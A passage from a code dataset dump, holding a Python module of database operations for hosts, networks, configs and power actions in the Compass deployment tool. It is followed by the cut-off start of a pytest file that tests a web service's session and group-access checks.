Huawei Technologies Co. Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Host database operations.\"\"\"\nimport functools\nimport logging\nimport netaddr\n\nfrom compass.db.api import database\nfrom compass.db.api import metadata_holder as metadata_api\nfrom compass.db.api import permission\nfrom compass.db.api import user as user_api\nfrom compass.db.api import utils\nfrom compass.db import exception\nfrom compass.db import models\n\n\nSUPPORTED_FIELDS = ['name', 'os_name', 'owner', 'mac']\nSUPPORTED_MACHINE_HOST_FIELDS = ['mac', 'tag', 'location', 'os_name', 'os_id']\nSUPPORTED_NETOWORK_FIELDS = [\n 'interface', 'ip', 'is_mgmt', 'is_promiscuous'\n]\nRESP_FIELDS = [\n 'id', 'name', 'hostname', 'os_name', 'os_id', 'owner', 'mac',\n 'switch_ip', 'port', 'switches', 'os_installer', 'ip',\n 'reinstall_os', 'os_installed', 'tag', 'location', 'networks',\n 'created_at', 'updated_at'\n]\nRESP_CLUSTER_FIELDS = [\n 'id', 'name', 'os_name', 'reinstall_distributed_system',\n 'distributed_system_name', 'owner', 'adapter_id',\n 'distributed_system_installed',\n 'adapter_id', 'created_at', 'updated_at'\n]\nRESP_NETWORK_FIELDS = [\n 'id', 'ip', 'interface', 'netmask', 'is_mgmt', 'is_promiscuous',\n 'created_at', 'updated_at'\n]\nRESP_CONFIG_FIELDS = [\n 'os_config',\n 'config_setp',\n 'config_validated',\n 'networks',\n 'created_at',\n 'updated_at'\n]\nRESP_DEPLOYED_CONFIG_FIELDS = [\n 'deployed_os_config'\n]\nRESP_DEPLOY_FIELDS = [\n 'status', 'host'\n]\nUPDATED_FIELDS = ['host_id', 'name', 'reinstall_os']\nUPDATED_CONFIG_FIELDS = [\n 'put_os_config'\n]\nPATCHED_CONFIG_FIELDS = [\n 'patched_os_config'\n]\nUPDATED_DEPLOYED_CONFIG_FIELDS = [\n 'deployed_os_config'\n]\nADDED_NETWORK_FIELDS = [\n 'interface', 'ip', 'subnet_id'\n]\nOPTIONAL_ADDED_NETWORK_FIELDS = ['is_mgmt', 'is_promiscuous']\nUPDATED_NETWORK_FIELDS = [\n 'interface', 'ip', 'subnet_id', 'subnet', 'is_mgmt',\n 'is_promiscuous'\n]\nIGNORE_FIELDS = [\n 'id', 'created_at', 'updated_at'\n]\nRESP_STATE_FIELDS = [\n 'id', 'state', 'percentage', 'message', 'severity', 'ready'\n]\nUPDATED_STATE_FIELDS = [\n 'state', 'percentage', 'message', 'severity'\n]\nUPDATED_STATE_INTERNAL_FIELDS = [\n 'ready'\n]\nRESP_LOG_FIELDS = [\n 'id', 'filename', 'position', 'partial_line', 'percentage',\n 'message', 'severity', 'line_matcher_name'\n]\nADDED_LOG_FIELDS = [\n 'filename'\n]\nUPDATED_LOG_FIELDS = [\n 'position', 'partial_line', 'percentage',\n 'message', 'severity', 'line_matcher_name'\n]\n\n\n@utils.supported_filters(optional_support_keys=SUPPORTED_FIELDS)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef list_hosts(user=None, session=None, **filters):\n \"\"\"List hosts.\"\"\"\n return utils.list_db_objects(\n session, models.Host, **filters\n )\n\n\n@utils.supported_filters(\n optional_support_keys=SUPPORTED_MACHINE_HOST_FIELDS)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.output_filters(\n missing_ok=True,\n tag=utils.general_filter_callback,\n location=utils.general_filter_callback,\n os_name=utils.general_filter_callback,\n os_id=utils.general_filter_callback\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef list_machines_or_hosts(user=None, session=None, **filters):\n \"\"\"List hosts.\"\"\"\n machines = utils.list_db_objects(\n session, models.Machine, **filters\n )\n machines_or_hosts = []\n for machine in machines:\n host = machine.host\n if host:\n machines_or_hosts.append(host)\n else:\n machines_or_hosts.append(machine)\n return machines_or_hosts\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef get_host(\n host_id, exception_when_missing=True,\n user=None, session=None, **kwargs\n):\n \"\"\"get host info.\"\"\"\n return utils.get_db_object(\n session, models.Host,\n exception_when_missing, id=host_id\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOSTS\n)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef get_machine_or_host(\n host_id, exception_when_missing=True,\n user=None, session=None, **kwargs\n):\n \"\"\"get host info.\"\"\"\n machine = utils.get_db_object(\n session, models.Machine,\n exception_when_missing, id=host_id\n )\n if not machine:\n return None\n host = machine.host\n if host:\n return host\n else:\n return machine\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_CLUSTERS\n)\n@utils.wrap_to_dict(RESP_CLUSTER_FIELDS)\ndef get_host_clusters(host_id, user=None, session=None, **kwargs):\n \"\"\"get host clusters.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n return [clusterhost.cluster for clusterhost in host.clusterhosts]\n\n\ndef _conditional_exception(host, exception_when_not_editable):\n if exception_when_not_editable:\n raise exception.Forbidden(\n 'host %s is not editable' % host.name\n )\n else:\n return False\n\n\ndef is_host_validated(session, host):\n if not host.config_validated:\n raise exception.Forbidden(\n 'host %s is not validated' % host.name\n )\n\n\ndef is_host_editable(\n session, host, user,\n reinstall_os_set=False, exception_when_not_editable=True\n):\n if reinstall_os_set:\n if host.state.state == 'INSTALLING':\n logging.debug('installing host is not editable')\n return _conditional_exception(\n host, exception_when_not_editable\n )\n elif not host.reinstall_os:\n logging.debug(\n 'host is not editable when not reinstall os'\n )\n return _conditional_exception(\n host, exception_when_not_editable\n )\n if not user.is_admin and host.creator_id != user.id:\n logging.debug(\n 'user do not have permission to edit host'\n )\n return _conditional_exception(\n host, exception_when_not_editable\n )\n return True\n\n\ndef validate_host(session, host):\n if not host.hostname:\n raise exception.Invalidparameter(\n 'host %s does not set hostname' % host.name\n )\n if not host.host_networks:\n raise exception.InvalidParameter(\n 'host %s does not have any network' % host.name\n )\n mgmt_interface_set = False\n for host_network in host.host_networks:\n if host_network.is_mgmt:\n if mgmt_interface_set:\n raise exception.InvalidParameter(\n 'host %s multi interfaces set mgmt ' % host.name\n )\n if host_network.is_promiscuous:\n raise exception.InvalidParameter(\n 'host %s interface %s is mgmt but promiscuous' % (\n host.name, host_network.interface\n )\n )\n mgmt_interface_set = True\n if not mgmt_interface_set:\n raise exception.InvalidParameter(\n 'host %s has no mgmt interface' % host.name\n )\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(name=utils.check_name)\n@utils.wrap_to_dict(RESP_FIELDS)\ndef _update_host(session, user, host_id, **kwargs):\n \"\"\"Update a host internal.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(\n session, host, user,\n reinstall_os_set=kwargs.get('reinstall_os', False)\n )\n return utils.update_db_object(session, host, **kwargs)\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST\n)\ndef update_host(host_id, user=None, session=None, **kwargs):\n \"\"\"Update a host.\"\"\"\n return _update_host(session, user, host_id=host_id, **kwargs)\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST\n)\ndef update_hosts(data=[], user=None, session=None):\n hosts = []\n for host_data in data:\n hosts.append(_update_host(session, user, **host_data))\n return hosts\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST\n)\n@utils.wrap_to_dict(\n RESP_FIELDS + ['status', 'host'],\n host=RESP_FIELDS\n)\ndef del_host(\n host_id, force=False, from_database_only=False,\n user=None, session=None, **kwargs\n):\n \"\"\"Delete a host.\"\"\"\n from compass.db.api import cluster as cluster_api\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n if host.state.state != 'UNINITIALIZED' and force:\n host.state.state = 'ERROR'\n is_host_editable(\n session, host, user,\n reinstall_os_set=True\n )\n cluster_ids = []\n for clusterhost in host.clusterhosts:\n if clusterhost.state.state != 'UNINITIALIZED' and force:\n clusterhost.state.state = 'ERROR'\n cluster_api.is_cluster_editable(\n session, clusterhost.cluster, user,\n reinstall_distributed_system_set=True\n )\n cluster_ids.append(clusterhost.cluster_id)\n\n if host.state.state == 'UNINITIALIZED' or from_database_only:\n return utils.del_db_object(session, host)\n else:\n logging.info(\n 'send del host %s task to celery', host_id\n )\n from compass.tasks import client as celery_client\n celery_client.celery.send_task(\n 'compass.tasks.delete_host',\n (\n user.email, host_id, cluster_ids\n )\n )\n return {\n 'status': 'delete action sent',\n 'host': host,\n }\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef get_host_config(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host config.\"\"\"\n return utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_DEPLOYED_CONFIG_FIELDS)\ndef get_host_deployed_config(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host deployed config.\"\"\"\n return utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n\n@utils.replace_filters(\n os_config='deployed_os_config'\n)\n@utils.supported_filters(\n UPDATED_DEPLOYED_CONFIG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef update_host_deployed_config(host_id, user=None, session=None, **kwargs):\n \"\"\"Update host deployed config.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(session, host, user)\n is_host_validated(session, host)\n return utils.update_db_object(session, host, **kwargs)\n\n\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef _update_host_config(session, user, host, **kwargs):\n \"\"\"Update host config.\"\"\"\n is_host_editable(session, host, user)\n return utils.update_db_object(session, host, **kwargs)\n\n\n@utils.replace_filters(\n os_config='put_os_config'\n)\n@utils.supported_filters(\n UPDATED_CONFIG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_CONFIG\n)\ndef update_host_config(host_id, user=None, session=None, **kwargs):\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n def os_config_validates(config):\n metadata_api.validate_os_config(\n session, config, os_id=host.os_id\n )\n\n @utils.input_validates(\n put_os_config=os_config_validates,\n )\n def update_config_internal(host, **in_kwargs):\n return _update_host_config(\n session, user, host, **kwargs\n )\n\n return update_config_internal(\n host, **kwargs\n )\n\n\n@utils.replace_filters(\n os_config='patched_os_config'\n)\n@utils.supported_filters(\n PATCHED_CONFIG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_CONFIG\n)\ndef patch_host_config(host_id, user=None, session=None, **kwargs):\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n\n def os_config_validates(config):\n metadata_api.validate_os_config(\n session, config, os_id=host.os_id\n )\n\n @utils.output_validates(\n os_config=os_config_validates,\n )\n def patch_config_internal(host, **in_kwargs):\n return _update_host_config(\n session, user, host, **in_kwargs\n )\n\n return patch_config_internal(\n host, **kwargs\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST_CONFIG\n)\n@utils.wrap_to_dict(RESP_CONFIG_FIELDS)\ndef del_host_config(host_id, user=None, session=None):\n \"\"\"delete a host config.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(session, host, user)\n return utils.update_db_object(\n session, host, os_config={}, config_validated=False\n )\n\n\n@utils.supported_filters(\n optional_support_keys=SUPPORTED_NETOWORK_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef list_host_networks(host_id, user=None, session=None, **filters):\n \"\"\"Get host networks.\"\"\"\n return utils.list_db_objects(\n session, models.HostNetwork,\n host_id=host_id, **filters\n )\n\n\n@utils.supported_filters(\n optional_support_keys=SUPPORTED_NETOWORK_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef list_hostnetworks(user=None, session=None, **filters):\n \"\"\"Get host networks.\"\"\"\n return utils.list_db_objects(\n session, models.HostNetwork, **filters\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef get_host_network(\n host_id, host_network_id,\n user=None, session=None, **kwargs\n):\n \"\"\"Get host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n if host_network.host_id != host_id:\n raise exception.RecordNotExists(\n 'host %s does not own host network %s' % (\n host_id, host_network_id\n )\n )\n return host_network\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_HOST_NETWORKS\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef get_hostnetwork(host_network_id, user=None, session=None, **kwargs):\n \"\"\"Get host network.\"\"\"\n return utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n\n\n@utils.supported_filters(\n ADDED_NETWORK_FIELDS,\n optional_support_keys=OPTIONAL_ADDED_NETWORK_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(\n ip=utils.check_ip\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef _add_host_network(\n session, user, host_id, exception_when_existing=True,\n interface=None, ip=None, **kwargs\n):\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_editable(session, host, user)\n return utils.add_db_object(\n session, models.HostNetwork,\n exception_when_existing,\n host_id, interface, ip=ip, **kwargs\n )\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef add_host_network(\n host_id, exception_when_existing=True,\n interface=None, user=None, session=None, **kwargs\n):\n \"\"\"Create a host network.\"\"\"\n return _add_host_network(\n session, user, host_id, exception_when_existing,\n interface=interface, **kwargs\n )\n\n\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef add_host_networks(\n exception_when_existing=False,\n data=[], user=None, session=None\n):\n \"\"\"Create host networks.\"\"\"\n hosts = []\n failed_hosts = []\n for host_data in data:\n host_id = host_data['host_id']\n networks = host_data['networks']\n host_networks = []\n failed_host_networks = []\n for network in networks:\n ip_int = long(netaddr.IPAddress(network['ip']))\n host_network = utils.get_db_object(\n session, models.HostNetwork, False,\n ip_int=ip_int\n )\n if (\n host_network and not (\n host_network.host_id == host_id and\n host_network.interface == network['interface']\n )\n ):\n logging.error('ip %s exists in host network %s' % (\n network['ip'], host_network.id\n ))\n failed_host_networks.append(network)\n else:\n host_networks.append(_add_host_network(\n session, user, host_id, exception_when_existing,\n **network\n ))\n if host_networks:\n hosts.append({'host_id': host_id, 'networks': host_networks})\n if failed_host_networks:\n failed_hosts.append({\n 'host_id': host_id, 'networks': failed_host_networks\n })\n return {\n 'hosts': hosts,\n 'failed_hosts': failed_hosts\n }\n\n\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef _update_host_network(\n session, user, host_network, **kwargs\n):\n is_host_editable(session, host_network.host, user)\n return utils.update_db_object(session, host_network, **kwargs)\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_NETWORK_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(\n ip=utils.check_ip\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef update_host_network(\n host_id, host_network_id, user=None, session=None, **kwargs\n):\n \"\"\"Update a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n if host_network.host_id != host_id:\n raise exception.RecordNotExists(\n 'host %s does not own host network %s' % (\n host_id, host_network_id\n )\n )\n return _update_host_network(\n session, user, host_network, **kwargs\n )\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_NETWORK_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@utils.input_validates(\n ip=utils.check_ip\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_ADD_HOST_NETWORK\n)\ndef update_hostnetwork(host_network_id, user=None, session=None, **kwargs):\n \"\"\"Update a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork, id=host_network_id\n )\n return _update_host_network(\n session, user, host_network, **kwargs\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST_NETWORK\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef del_host_network(\n host_id, host_network_id, user=None,\n session=None, **kwargs\n):\n \"\"\"Delete a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork,\n id=host_network_id\n )\n if host_network.host_id != host_id:\n raise exception.RecordNotExists(\n 'host %s does not own host network %s' % (\n host_id, host_network_id\n )\n )\n is_host_editable(session, host_network.host, user)\n return utils.del_db_object(session, host_network)\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEL_HOST_NETWORK\n)\n@utils.wrap_to_dict(RESP_NETWORK_FIELDS)\ndef del_hostnetwork(host_network_id, user=None, session=None, **kwargs):\n \"\"\"Delete a host network.\"\"\"\n host_network = utils.get_db_object(\n session, models.HostNetwork, id=host_network_id\n )\n is_host_editable(session, host_network.host, user)\n return utils.del_db_object(session, host_network)\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_GET_HOST_STATE\n)\n@utils.wrap_to_dict(RESP_STATE_FIELDS)\ndef get_host_state(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host state info.\"\"\"\n return utils.get_db_object(\n session, models.Host, id=host_id\n ).state_dict()\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_STATE_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST_STATE\n)\n@utils.wrap_to_dict(RESP_STATE_FIELDS)\ndef update_host_state(host_id, user=None, session=None, **kwargs):\n \"\"\"Update a host state.\"\"\"\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n utils.update_db_object(session, host.state, **kwargs)\n return host.state_dict()\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_STATE_INTERNAL_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_UPDATE_HOST_STATE\n)\n@utils.wrap_to_dict(['status', 'host'])\ndef update_host_state_internal(\n hostname, from_database_only=False,\n user=None, session=None, **kwargs\n):\n \"\"\"Update a host state.\"\"\"\n if isinstance(hostname, (int, long)):\n host = utils.get_db_object(\n session, models.Host, id=hostname\n )\n else:\n host = utils.get_db_object(\n session, models.Host, name=hostname\n )\n if 'ready' in kwargs and kwargs['ready'] and not host.state.ready:\n ready_triggered = True\n else:\n ready_triggered = False\n clusterhost_ready = {}\n cluster_os_ready = {}\n if ready_triggered:\n for clusterhost in host.clusterhosts:\n cluster = clusterhost.cluster\n if cluster.distributed_system:\n clusterhost_ready[cluster.id] = False\n else:\n clusterhost_ready[cluster.id] = True\n all_os_ready = True\n for clusterhost_in_cluster in cluster.clusterhosts:\n host_in_cluster = clusterhost_in_cluster.host\n if host_in_cluster.id == host.id:\n continue\n if not host_in_cluster.state.ready:\n all_os_ready = False\n cluster_os_ready[cluster.id] = all_os_ready\n logging.info('host %s ready: %s', hostname, ready_triggered)\n logging.info(\"clusterhost_ready is: %s\", clusterhost_ready)\n logging.info(\"cluster_os_ready is %s\", cluster_os_ready)\n\n if not ready_triggered or from_database_only:\n logging.info('%s state is set to %s', host.name, kwargs)\n utils.update_db_object(session, host.state, **kwargs)\n if not host.state.ready:\n for clusterhost in host.clusterhosts:\n utils.update_db_object(\n session, clusterhost.state, ready=False\n )\n utils.update_db_object(\n session, clusterhost.cluster.state, ready=False\n )\n status = '%s state is updated' % host.name\n else:\n from compass.tasks import client as celery_client\n celery_client.celery.send_task(\n 'compass.tasks.os_installed',\n (\n host.id, clusterhost_ready,\n cluster_os_ready\n )\n )\n status = '%s: clusterhost ready %s cluster os ready %s' % (\n host.name, clusterhost_ready, cluster_os_ready\n )\n logging.info('action status: %s', status)\n return {\n 'status': status,\n 'host': host.state_dict()\n }\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef get_host_log_histories(host_id, user=None, session=None, **kwargs):\n \"\"\"Get host log history.\"\"\"\n return utils.list_db_objects(\n session, models.HostLogHistory, id=host_id\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef get_host_log_history(host_id, filename, user=None, session=None, **kwargs):\n \"\"\"Get host log history.\"\"\"\n return utils.get_db_object(\n session, models.HostLogHistory, id=host_id, filename=filename\n )\n\n\n@utils.supported_filters(\n optional_support_keys=UPDATED_LOG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef update_host_log_history(\n host_id, filename, user=None,\n session=None, **kwargs\n):\n \"\"\"Update a host log history.\"\"\"\n host_log_history = utils.get_db_object(\n session, models.HostLogHistory, id=host_id, filename=filename\n )\n return utils.update_db_object(session, host_log_history, **kwargs)\n\n\n@utils.supported_filters(\n ADDED_LOG_FIELDS,\n optional_support_keys=UPDATED_LOG_FIELDS,\n ignore_support_keys=IGNORE_FIELDS\n)\n@database.run_in_session()\n@utils.wrap_to_dict(RESP_LOG_FIELDS)\ndef add_host_log_history(\n host_id, exception_when_existing=False,\n filename=None, user=None, session=None, **kwargs\n):\n \"\"\"add a host log history.\"\"\"\n return utils.add_db_object(\n session, models.HostLogHistory, exception_when_existing,\n host_id, filename, **kwargs\n )\n\n\n@utils.supported_filters(optional_support_keys=['poweron'])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEPLOY_HOST\n)\n@utils.wrap_to_dict(\n RESP_DEPLOY_FIELDS,\n host=RESP_CONFIG_FIELDS\n)\ndef poweron_host(\n host_id, poweron={}, user=None, session=None, **kwargs\n):\n \"\"\"power on host.\"\"\"\n from compass.tasks import client as celery_client\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_validated(session, host)\n celery_client.celery.send_task(\n 'compass.tasks.poweron_host',\n (host_id,)\n )\n return {\n 'status': 'poweron %s action sent' % host.name,\n 'host': host\n }\n\n\n@utils.supported_filters(optional_support_keys=['poweroff'])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEPLOY_HOST\n)\n@utils.wrap_to_dict(\n RESP_DEPLOY_FIELDS,\n host=RESP_CONFIG_FIELDS\n)\ndef poweroff_host(\n host_id, poweroff={}, user=None, session=None, **kwargs\n):\n \"\"\"power off host.\"\"\"\n from compass.tasks import client as celery_client\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_validated(session, host)\n celery_client.celery.send_task(\n 'compass.tasks.poweroff_host',\n (host_id,)\n )\n return {\n 'status': 'poweroff %s action sent' % host.name,\n 'host': host\n }\n\n\n@utils.supported_filters(optional_support_keys=['reset'])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_DEPLOY_HOST\n)\n@utils.wrap_to_dict(\n RESP_DEPLOY_FIELDS,\n host=RESP_CONFIG_FIELDS\n)\ndef reset_host(\n host_id, reset={}, user=None, session=None, **kwargs\n):\n \"\"\"reset host.\"\"\"\n from compass.tasks import client as celery_client\n host = utils.get_db_object(\n session, models.Host, id=host_id\n )\n is_host_validated(session, host)\n celery_client.celery.send_task(\n 'compass.tasks.reset_host',\n (host_id,)\n )\n return {\n 'status': 'reset %s action sent' % host.name,\n 'host': host\n }\n","sub_path":"compass/db/api/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":29167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"35255499","text":"import os\nimport requests\nimport time\nimport apphelpers.sessions as sessionslib\n\nfrom .app.models import globalgroups, sitegroups\n\nfrom converge import settings\n\n\nclass urls:\n base = 'http://127.0.0.1:8000/'\n echo = base + 'echo'\n echo_for_registered = base + 'secure-echo'\n echo_for_groups = base + 'echo-groups'\n echo_for_sitegroups = base + 'sites/1/echo-groups'\n\n\npid_path = 'tests/run/app.pid'\n\nsessiondb_conn = dict(host=settings.SESSIONSDB_HOST,\n port=settings.SESSIONSDB_PORT,\n password=settings.SESSIONSDB_PASSWD,\n db=settings.SESSIONSDB_NO)\nsessionsdb = sessionslib.SessionDBHandler(sessiondb_conn)\nsessionsdb.destroy_all()\n\n\ndef gunicorn_setup_module(): # not working\n if os.path.exists(pid_path):\n os.remove(pid_path)\n cmd = f'gunicorn tests.service:__hug_wsgi__ -p {pid_path} -D'\n os.system(cmd)\n for i in range(10):\n if os.path.exists(pid_path):\n time.sleep(2)\n break\n\n\ndef gunicorn_teardown_module():\n if os.path.exists(pid_path):\n cmd = f'kill -9 `cat {pid_path}`'\n os.system(cmd)\n\n\ndef test_get():\n word = 'hello'\n url = urls.echo + '/' + word\n assert requests.get(url).json() == word\n\n\ndef test_get_params():\n word = 'hello'\n url = urls.echo + '/' + word\n params = {'word': word}\n assert requests.get(url, params=params).json() == word\n\n\ndef test_get_multi_params():\n nums = [3, 5]\n url = urls.base + 'add'\n params = {'nums': nums}\n assert requests.get(url, params=params).json() == sum(nums)\n\n\ndef test_post():\n word = 'hello'\n url = urls.echo\n assert requests.post(url, json={'word': word}).json() == word\n\n\ndef test_echo_for_registered():\n word = 'hello'\n headers = {'NoAuthorization': 'Header'}\n url = urls.echo_for_registered + '/' + word\n resp = requests.get(url, headers=headers)\n assert resp.status_code == 401\n\n\ndef test_user_id():\n uid = 101\n d = dict(uid=uid, groups=[])\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n\n word = 'hello'\n url = urls.echo + '/' + word\n assert requests.get(url, headers=headers).json() == ('%s:%s' % (uid, word))\n\n url = urls.base + 'me/uid'\n\n data = {'uid': None}\n resp = requests.post(url, json=data, headers=headers)\n assert resp.json() == uid\n\n data = {'uid': 1} # invalid claim\n resp = requests.post(url, json=data, headers=headers)\n assert resp.json() == uid\n\n data = {'uid': uid}\n resp = requests.post(url, json=data, headers=headers)\n assert resp.json() == uid\n\n\ndef test_group_access():\n # 1. No group\n uid = 111\n groups = []\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_groups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 2. Forbidden group\n uid = 112\n groups = [globalgroups.forbidden.value]\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_groups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n # 3. Access group\n uid = 113\n groups = [globalgroups.privileged.value]\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 200\n\n # 4. Other groups\n uid = 112\n groups = [globalgroups.others.value]\n d = dict(uid=uid, groups=groups)\n sid = sessionsdb.create(**d)\n url = urls.echo_for_groups\n\n headers = {'Authorization': sid}\n assert requests.get(url, headers=headers).status_code == 403\n\n\ndef test_not_found():\n uid = 117\n d = dict(uid=uid, groups=[], site_groups={})\n sid = sessionsdb.create(**d)\n\n headers = {'Authorization': sid}\n\n url = urls.base + 'snakes/viper'\n assert requests.get(url).status_code == 404\n\n url = urls.base + 'sites/1/snakes/viper'\n assert requests.get(url, headers=headers).status_code == 404\n\n\ndef test_site_group_access():\n # 1. No group\n uid = 114\n groups = []\n site_groups = {}\n d = dict(uid=uid, groups=groups, site_groups=site_groups)\n sid = sessionsdb.create(**d)\n url = 